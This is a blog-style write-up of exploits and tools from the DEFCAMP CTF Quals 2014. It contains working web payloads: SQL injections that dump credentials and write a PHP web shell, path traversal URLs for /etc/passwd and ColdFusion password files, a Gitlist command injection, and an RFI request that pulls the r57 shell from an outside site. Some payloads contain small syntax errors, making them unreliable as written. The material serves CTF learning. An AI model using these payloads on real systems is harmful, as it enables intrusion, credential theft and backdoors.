Exploring D-CTF Quals 2014's Exploits

Last weekend I played some of the DEFCAMP CTF Quals. It was pretty intense. For (my own) organizational purposes, I made a list of all the technologies and vulnerabilities found in this CTF, some based on my team's game, some based on the CTF write-ups git repo.

Vulnerabilities

Remote File Inclusion and Local File Inclusion Vulnerabilities

In Remote File Inclusion (RFI) an attacker can load exploits to the server. An attacker can use RFI to run exploits in both server and client sides. PHP's include() is extremely vulnerable to RFI attacks.

Local File Inclusion (LFI) is similar to RFI but only files that are currently in the server can be included. This type of vulnerability is seem in forms for file uploading (with improper sanitation).

An example of RFI exploitation is the case where the form only accepts some type of extensions (such as JPG or PNG) but the verification is made in the client side. In this case, an attacker can tamper the HTTP requests to send shell code (with PHP extension, for example). I've shown examples of this attack in the Natas post. There I've explained that the trick was to rename a PHP shell code to one of these safe extensions.

TimThumb and LFI

TimThumb is a PHP script for manipulating web images. It was recently discontinued because of security issues.

With TimThumb 1.33, an attacker is able to upload a shell by appending it to an image. All she needs to do is to have it in some online subdomain. TimThumb will store this image in a cache folder and generate a MD5 of the full path of the shell. The last step is to perform a LFI attack with the shell in this folder. Check this example of LFI exploitation.

CMS Mini and RFI

CMS Mini is file system to build simple websites. It has several vulnerabilities such as CSRF, RFI, and XSS.

An example of RFI vulnerability in CMS Mini is explored using curl:

http://
[target/IP]/cmsmini/admin/edit.php?path=&name=../../../../../etc/passwd

For more examples of exploits, check 1337day and this exploit-db.

ApPHP and Remote Code Execution

ApPHP is a blog script. It is known for having several vulnerabilities, including remote code execution (RCE). An example of RCE exploit for ApPHP can be seen here. A good start is to check the PHP's disable_function list for stuff to hacker the server.

In this CTF, the challenge was to find what was not in that list. For instance, it was possible to use $_POST and $_COOKIE to send strings to functions such as scandir() and get_file_contents():

GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/
Cookie: 0=include

In addition, with a writable directory we can drop a shell in the server (you can use script-kiddies scripts like r57 shell.net, but in real life, keep in mind that they are super uber backdoored).

Post Request: 0=include/myfile.php
Cookie: 0=http://www.r57shell.net/shell/r57.txt

Gitlist and Remote Command Execution

Gitlist is an application to browse github repositories in a browser. The versions up to 5.0 are known for allowing remote attackers to execute arbitrary commands via shell, a type of command injection. Exploits for this vulnerability can be seen at hatriot, at packet storm, at 1337day, and at exploit-db.

In this CTF, the following command could be used to look for the flag:

http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60

LibreOffice's Socket Connections

LibreOffice's has a binary soffice.bin that takes socket connections on the port 2002 (in this CTF, in the VPN's localhost).

For instance, the command unoconv can be used to convert a file to a LibreOffice supported format. The flag -c opens a connection by the client to connect to an LibreOffice instance. It also can be used by the listener to make LibreOffice listen.

From the documentation, the default connection string is:

Default connection string is "socket,host=localhost,port=2002;urp;StarOffice.ComponentContext"

Therefore, you can connect to the socket and convert some document (such as /flag.txt) to a PDF for example:

$ unoconv --connection 'socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext' -f pdf /flag.txt

An example of payload can be seen here.

ColdFusion and Local File Disclosure

ColdFusion is an old web application development platform. It carries its own (interpreted) language, CFM, with a Java backend.

CFM has scripting features like ASP and PHP, and syntax resembling HTML and JavaScript. ColdFusion scripts have cfm and cfc file extension. For instance, Adobe ColdFusion 11 and Railio 4.2, the two platform accepting CFM, were both released in the beginning of 2014.

The problem is that CFM is vulnerable to a variety of attacks, including Local File Disclosure (LFD) and SQL injection (SQLi). Adding this to the fact that ColdFusion scripts usually run on elevated privileged users, we have a very vulnerable platform.

SQL Injection (SQLi)

SQL Injection is a classic attack where one injects exploits in a SQL query. Vulnerabilities of this type can be spot in queries such as index.php?id=1. I showed some of these exploits in my Natas post.

In this CTF, these were some of the exploits that could be used:

  • List everything in a database, where 0x3a is the hexadecimal symbol for ::
UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email),3 FROM cms.users--
  • See the password file content:
UNION ALL SELECT 1,LOAD_FILE("/etc/passwd"),3--
  • Write files and create a PHP shell into URL/shell.php, we can use a parameter x to takes a parameter to be executed (based on this):
UNION ALL SELECT 1 "<?php header("Content-Type: text/plain;charset=utf-8"); echo system($-GET["x"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php"--

Notice the trailing pair of hyphens -- which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed (it removes the trailing single-quote left over from the modified query). To learn more about how to mitigate SQLi, I recommend OWASP's SQLi Prevention Cheat Sheet and this nice guide for SQLi mitigation by OWSAP OWTF.

By the way, it's useful in general to know HTML URL Encoding to craft these URLs.

CesarFTP 0.99g and Buffer Overflow

CesarFTP 0.99g is an easy-to-use FTP server. It is also known for having several vulnerabities, including buffer overflow.

For example, see this exploit for Metasploit from exploit-db (or an older one here).

File Disclosure of Password Hashes

This vulnerability provides a 30 second window in the Administration panel, which can e use to write a shell code. The main idea is a directory traversal to the password.proprieties that can be used to login in the server.

Ingredients of this attack are:

  • The target must have ColdFusion administrator available, which is by default mapped to CFIDE/administrator/enter.cfm. If it gets 500, it should be switched to HTTPS.

  • At the ColdFusion administrator, verify the version, and then use these injections:

(Version 6): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

(Version 7): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

(Version 8): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

(All versions): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

Useful Tools

Vulnerability Scanners

Vulnerability scanners can be useful for several problems. For instance, for a PHP static source code analyser, we can use RIPS.

In this CTF we had to scan for Heartbleed, and we used this script.

Scapy

Scapy is a Python lib for crafting packets. It can be useful for problems such as port knocking. For illustration, check this example from PHD CTF 2011 and this from ASIS CTF 2014. Check this project too.

Steganography

One of the questions had a reference to the paranoia.jar tool, which hides text in an image file using 128 bit AES encryption.

To run the tool (after downloading it) just do:

java -jar paranoia.jar

HTTP/HTTPS Request Tampering

Very useful for the RFI problems (but not limited to them):

  • Tamper Data: view and modify HTTP/HTTPS headers.
  • Burp: a Java application to secure or penetrate web applications.

Wireshark

At some point I'm going to dedicate an entire post for Wireshark, but for this CTF the important things to know were:

  • Look for POST requests:
http.request.method == "POST"
  • Submit the found data (same username, nonce, and password) with the command:
$ curl --data 'user=manager&nonce=7413734ab666ce02cf27c9862c96a8e7&pass=3ecd6317a873b18e7dde351ac094ee3b' HOST

Exif data extractor:

ExifTool is used for reading, writing, and manipulating image metadata:

$ tar -xf Image-ExifTool-9.74.tar.gz
$  cd Image-ExifTool-9.74/
$ perl Makefile.PL
$ make test
$ sudo make install
$ exiftool IMAGEFILE

MD5 Lookups

Several hashes in this CTF needed to be searched. Google in general does a good job, but here are some specific websites: hash-killer and md5this.

In the Shell

  • Hexadecimal decoders are essential. You can use Python's hex:
$ python -c 'print "2f722f6e6574736563".decode("hex")'
/r/netsec

or command line xxd:

$ yum install vim-common
$ xxd -r -p <<< 2f722f6e6574736563
/r/netsec
  • Base64 decoders are also essential:
$ base64 --decode <<< BASE64STRING > OUTPUT
  • nmap, obviously. You can use it in Python scripts, using the subprocess library:
print "[*] Scanning for open ports using nmap"
subprocess.call("nmap -sS -sV -T4 -p 22-2048 " + base_URL, shell=True)
  • tee is nice to store and view the output of another command. It can be very useful with curl. A simple example:
$ ls | tee file
  • chattr is used to change the file attributes of a Linux file system. For example, the command chattr +i on a file make it not be able to be removed (useful for zombie processes hunting).

  • nm is useful for listing symbols from object files

  • md5 hashing is used all the time:

$ echo -n password | md5sum
5f4dcc3b5aa765d61d8327deb882cf99
  • You might want to append a shell code to an image (for example, a GIF file):
$ cat PHP-shell.php >> fig.gif
  • Now a special one: Windows! One of the trivia questions in this CTF. How to disable the Windows XP Firewall from command line:
netsh firewall set opmode mode=DISABLE.

That's it. Hack all the things!